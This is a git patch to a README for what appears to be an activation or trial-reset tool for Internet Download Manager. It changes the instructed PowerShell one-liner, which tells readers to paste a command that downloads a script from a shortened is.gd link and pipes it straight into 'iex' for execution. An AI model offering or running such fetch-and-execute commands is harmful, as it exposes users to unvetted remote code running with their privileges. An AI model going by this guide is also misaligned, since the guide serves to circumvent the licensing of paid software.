From 0ba2f5c4ba0223a9d004e64429ba8dab9b9a0e2a Mon Sep 17 00:00:00 2001 From: Golam Muktadir Hossain Saber <63154732+gmh-saber@users.noreply.github.com> Date: Tue, 11 Jun 2024 13:06:02 +0600 Subject: [PATCH] Update README.md Changed `iex(irm is.gd/idm_reset)` to ``` iwr -useb is.gd/idm_reset | iex ``` --- README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 6d831d0..0ceba3a 100644 --- a/README.md +++ b/README.md @@ -27,7 +27,9 @@ After that follow the below steps to activate it. * Right-click on the Windows start menu and select PowerShell or Terminal (Not CMD). * Copy-paste the below code and press enter -*`iex(irm is.gd/idm_reset)` +``` +iwr -useb is.gd/idm_reset | iex +``` * You will see the activation options, follow the on-screen instructions. * That’s all.